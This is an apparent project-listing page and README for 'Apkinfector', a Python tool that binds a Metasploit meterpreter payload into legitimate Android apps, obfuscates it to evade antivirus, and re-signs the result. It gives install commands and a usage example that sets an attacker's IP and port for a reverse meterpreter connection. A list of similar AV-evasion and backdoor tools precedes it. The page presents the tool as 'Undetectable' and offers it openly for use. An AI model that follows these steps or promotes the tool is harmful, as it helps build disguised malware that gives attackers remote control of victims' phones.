All Projects → PushpenderIndia → Apkinfector

PushpenderIndia / Apkinfector

Advanced Android AV Evasion Tool Written In Python 3 that can Embed/Bind meterpreter APK to any Legitimate APK

Programming Languages

python
139335 projects - #7 most used programming language
python3
1442 projects

Projects that are alternatives of or similar to Apkinfector

MsfMania
Python AV Evasion Tools
Stars: ✭ 388 (+269.52%)
Mutual labels:  meterpreter, antivirus-evasion
Spookflare
Loader, dropper generator with multiple features for bypassing client-side and network-side countermeasures.
Stars: ✭ 836 (+696.19%)
Mutual labels:  antivirus-evasion
Avsignseek
Tool written in python3 to determine where the AV signature is located in a binary/payload
Stars: ✭ 284 (+170.48%)
Mutual labels:  antivirus-evasion
Chimera
Chimera is a (shiny and very hack-ish) PowerShell obfuscation script designed to bypass AMSI and commercial antivirus solutions.
Stars: ✭ 463 (+340.95%)
Mutual labels:  antivirus-evasion
Ms17 010 Python
MS17-010: Python and Meterpreter
Stars: ✭ 305 (+190.48%)
Mutual labels:  meterpreter
Hacktheworld
An Python Script For Generating Payloads that Bypasses All Antivirus so far .
Stars: ✭ 527 (+401.9%)
Mutual labels:  antivirus-evasion
Whitecomet-Research
Research on malware creation and protection
Stars: ✭ 62 (-40.95%)
Mutual labels:  antivirus-evasion
Autopwn
A simple bash based metasploit automation tool!
Stars: ✭ 99 (-5.71%)
Mutual labels:  meterpreter
Pupy
Pupy is an opensource, cross-platform (Windows, Linux, OSX, Android) remote administration and post-exploitation tool mainly written in python
Stars: ✭ 6,737 (+6316.19%)
Mutual labels:  meterpreter
Foureye
AV Evasion Tool For Red Team Ops
Stars: ✭ 421 (+300.95%)
Mutual labels:  antivirus-evasion
Xeexe Topantivirusevasion
Undetectable & Xor encrypting with custom KEY (FUD Metasploit Rat) bypass Top Antivirus like BitDefender,Malwarebytes,Avast,ESET-NOD32,AVG,... & Automatically Add ICON and MANIFEST to excitable
Stars: ✭ 387 (+268.57%)
Mutual labels:  antivirus-evasion
Nxcrypt
NXcrypt - 'python backdoor' framework
Stars: ✭ 316 (+200.95%)
Mutual labels:  antivirus-evasion
Pezor
Open-Source PE Packer
Stars: ✭ 561 (+434.29%)
Mutual labels:  antivirus-evasion
Ghostshell
Malware indetectable, with AV bypass techniques, anti-disassembly, etc.
Stars: ✭ 293 (+179.05%)
Mutual labels:  meterpreter
Macro pack
macro_pack is a tool by @EmericNasi used to automatize obfuscation and generation of Office documents, VB scripts, shortcuts, and other formats for pentest, demo, and social engineering assessments. The goal of macro_pack is to simplify exploitation, antimalware bypass, and automatize the process from malicious macro and script generation to final document generation. It also provides a lot of helpful features useful for redteam or security research.
Stars: ✭ 1,072 (+920.95%)
Mutual labels:  meterpreter
Egesploit
EGESPLOIT is a golang library for malware development
Stars: ✭ 275 (+161.9%)
Mutual labels:  meterpreter
A Red Teamer Diaries
RedTeam/Pentest notes and experiments tested on several infrastructures related to professional engagements.
Stars: ✭ 382 (+263.81%)
Mutual labels:  meterpreter
Hercules
HERCULES is a special payload generator that can bypass antivirus softwares.
Stars: ✭ 526 (+400.95%)
Mutual labels:  meterpreter
Powershell Reverse Http
😇 A Powershell exploit service that opens a reverse http connection via meterpreter
Stars: ✭ 104 (-0.95%)
Mutual labels:  meterpreter
Eggshell
iOS/macOS/Linux Remote Administration Tool
Stars: ✭ 1,286 (+1124.76%)
Mutual labels:  meterpreter

APK Infector Logo

APK Infector

                    This small python script can do really awesome work.

Advanced Android Antivirus Evasion Tool Written In Python 3 that can Embed/Bind meterpreter APK to any Legitimate APK & can completely ofusticate the meterpreter payload with different techniques.

Features

  • [x] Fully Automate Payload Creation Using MSFvenom
  • [x] Creates a handler.rc File
  • [x] Undetectable
  • [x] Ofusticate Meterpreter APK
  • [x] Binds/Embeds Meterpreter APK with Any Legitimate APK
  • [x] Automatically Generates a Key which is used in signing
  • [x] Capable to Sign APK Using Jarsigner or APKsigner
  • [x] Zipalign the Signed APK
  • [x] Shuffles the Permissions of Meterpreter APK for AV Evasion
  • [x] Changes the default foldername and filenames which are being flagged by AV

Tools Overview

Front View Sample Feature
Index f

Prerequisite

  • [x] Python 3.X
  • [x] APKsigner or Jarsigner [One of them]
  • [x] APK Tool [Latest]
  • [x] ZipAlign

Tested On

Kali) Kali Linux - 2019.4

Installation & Usage


# Navigate to the /opt directory (optional)
$ cd /opt/

# Clone this repository
$ git clone https://github.com/PushpenderIndia/apkinfector.git

# Navigate to technowlogger folder
$ cd apkinfector

# Installing dependencies
$ apt-get update && apt-get install apktool && apt-get install zipalign && apt-get install apksigner

# Running the Tool for 1st Time
$ python3 infector.py --help

# Usage Example
$ python3 infector.py --lhost 192.168.43.70 --lport 4444 --apk-name NEW_APK_NAME --normal-apk /root/Desktop/Path/TO/Legitemate_APK_File.apk

Available Arguments

  • Optional Arguments
Short Hand Full Hand Description
-h --help show this help message and exit
  • Required Arguments
Short Hand Full Hand Description
--lhost 192.168.44.33 Attacker's IP Address
--lport 4444 Attacker's Port
-n NORMAL_APK --normal-apk NORMAL_APK Absolute Path of Legitimate APK File
--apk-name APKNAME APK Name (Anything You Want To Name)

Contribute

  • All Contributors are welcome, this repo needs contributors who will improve this tool to make it best.

Contact

[email protected]

More Features Coming Soon...

Note that the project description data, including the texts, logos, images, and/or trademarks, for each open source project belongs to its rightful owner. If you wish to add or remove any projects, please contact us at [email protected].